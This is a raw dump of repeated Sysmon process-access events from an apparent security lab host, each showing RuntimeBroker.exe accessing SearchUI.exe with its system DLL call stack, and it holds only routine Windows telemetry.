13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
